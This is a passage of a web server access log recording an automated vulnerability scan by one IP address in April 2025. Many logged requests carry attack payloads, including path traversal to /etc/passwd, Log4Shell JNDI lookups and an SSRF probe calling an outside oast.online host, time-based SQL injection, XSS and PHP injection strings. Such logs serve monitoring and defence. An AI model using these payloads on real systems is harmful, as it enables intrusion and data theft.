AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586" 154.84.62.234 - - [24/Apr/2025:07:33:14 -0400] "POST /./RestAPI/Connection HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:07:33:19 -0400] "GET /help/admin-guide/test.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:07:33:24 -0400] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:33:26 -0400] "POST /viewlog.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:33:50 -0400] "POST /autodiscover/autodiscover.json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:07:33:51 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.21" 154.84.62.234 - - [24/Apr/2025:07:34:01 -0400] "POST /delete_cart_goods.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:34:01 -0400] "POST /action.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:34:32 -0400] "POST /homeaction.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:07:35:17 -0400] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:35:17 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.27" 154.84.62.234 - - [24/Apr/2025:07:35:49 -0400] "POST /api/graphql HTTP/1.1" 200 0 "https://mgrokokbet.id/-/graphql-explorer" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:36:11 -0400] "POST /cgi?2 HTTP/1.1" 200 0 "http://mgrokokbet.id/mainFrame.htm" "Mozilla/5.0 (Kubuntu; Linux i686; 
rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:36:19 -0400] "POST /cgi?7 HTTP/1.1" 200 0 "http://mgrokokbet.id/mainFrame.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:36:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:36:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:37:10 -0400] "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:37:14 -0400] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:18 -0400] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:21 -0400] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:07:37:42 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:37:47 -0400] "POST /cas/v1/tickets/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.9.26" 154.84.62.234 - - [24/Apr/2025:07:40:01 -0400] "GET /login.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:123.0) Gecko/20100101 
Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:40:10 -0400] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:40:10 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:07:40:14 -0400] "POST /Side.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" 154.84.62.234 - - [24/Apr/2025:07:40:23 -0400] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2w9rffcVZkP0Ev1mOs2hSLzHhR5.php:aaa HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:40:48 -0400] "POST /classes/Login.php?f=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:40:51 -0400] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:40:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:41:13 -0400] "GET /?x=${jndi:ldap://${:-754}${:-243}.${hostName}.uri.d04qr7ij4pq19d75k490ejfdzetxwmp8b.oast.online/a} HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:41:13 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:07:41:19 -0400] "GET / HTTP/1.1" 403 1242 
"${jndi:ldap://${:-754}${:-243}.${hostName}.referer.d04qr7ij4pq19d75k490ercmu5tkc4ss3.oast.online}" "${jndi:ldap://${:-754}${:-243}.${hostName}.useragent.d04qr7ij4pq19d75k4903m4yb58ap5htf.oast.online}" 154.84.62.234 - - [24/Apr/2025:07:42:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:42:25 -0400] "GET /client/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:42:33 -0400] "GET /changePassword?username=administrator HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:43:04 -0400] "GET /api/blade-user/user-list HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:07:43:16 -0400] "GET /language/lang HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:07:43:23 -0400] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 403 1242 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d04qr7ij4pq19d75k490iohgepw1iw591.oast.online}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d04qr7ij4pq19d75k490f6a73nk1snzx1.oast.online}" 154.84.62.234 - - [24/Apr/2025:07:43:25 -0400] "POST /ddns_check.ccp HTTP/1.1" 200 
0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:45:05 -0400] "GET /index.php?p=member&destination HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.26" 154.84.62.234 - - [24/Apr/2025:07:45:25 -0400] "GET /scp/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:45:40 -0400] "GET /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:45:45 -0400] "PUT /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:07:45:50 -0400] "GET /2w9rfVs15FVzhlYzS7v8qe19Rz4.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:48:52 -0400] "POST /apply.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:07:49:31 -0400] "POST /wp-admin/admin.php?page=vfb-export HTTP/1.1" 200 0 "https://mgrokokbet.id/wp-admin/admin.php?page=vfb-export" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:49:59 -0400] "PUT /cgi-bin/gTu3TT.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:50:10 -0400] "GET /cgi-bin/gTu3TT.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:50:23 -0400] "PUT /cgi-bin/TtQp2L.txt HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:50:29 -0400] "DELETE /cgi-bin/TtQp2L.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.26" 154.84.62.234 - - [24/Apr/2025:07:50:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:07:50:54 -0400] "GET /archive/download?file=file:///etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:07:50:58 -0400] "GET /archive/download?file=http://d04qr7ij4pq19d75k490qj966893pozai.oast.online/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:51:36 -0400] "GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:51:36 -0400] "GET /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:51:43 -0400] "DELETE /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.7 (KHTML, like Gecko) Version/17.3.74 Safari/617.7" 154.84.62.234 - - [24/Apr/2025:07:51:48 -0400] "GET /images/icons_title.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:02 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; 
Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:52:01 -0400] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:52:11 -0400] "GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:14 -0400] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 85.208.96.210 - - [24/Apr/2025:07:52:16 -0400] "GET /robots.txt HTTP/1.1" 200 83 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 85.208.96.203 - - [24/Apr/2025:07:52:19 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" 154.84.62.234 - - [24/Apr/2025:07:52:23 -0400] "GET /wp-admin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:52:27 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:52:31 -0400] "GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/618.25.8 (KHTML, like Gecko) Version/17.3 Safari/618.25.8" 154.84.62.234 - - [24/Apr/2025:07:52:49 -0400] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:53:03 -0400] "GET 
/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:53:07 -0400] "GET /?p=1&xsg-provider=data://text/html,<\?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:53:21 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:53:28 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:54:15 -0400] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.19" 154.84.62.234 - - [24/Apr/2025:07:55:11 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:55:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:55:53 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:56:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:56:07 -0400] "GET /karma.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:56:14 -0400] "GET /?return_url=javascript:alert(document.domain) HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:57:01 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:07:57:10 -0400] "GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2w9rfWFiMFalSjYLUJ7cDxbPcKM.svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:07:58:07 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:07:58:07 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:58:51 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:07:58:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:59:19 -0400] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:07:59:58 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:00:19 -0400] "POST 
/wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:08:00:56 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:08:01:03 -0400] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:01:11 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:08:01:14 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" 154.84.62.234 - - [24/Apr/2025:08:01:29 -0400] "GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:08:01:33 -0400] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:08:01:49 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:08:01:50 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:08:01:56 -0400] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:08:01:58 -0400] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:02:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:08:02:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:03:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:08:04:03 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:08:04:03 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_8; en) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:05:51 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:08:05:57 -0400] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:08:06:04 -0400] "GET /user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - 
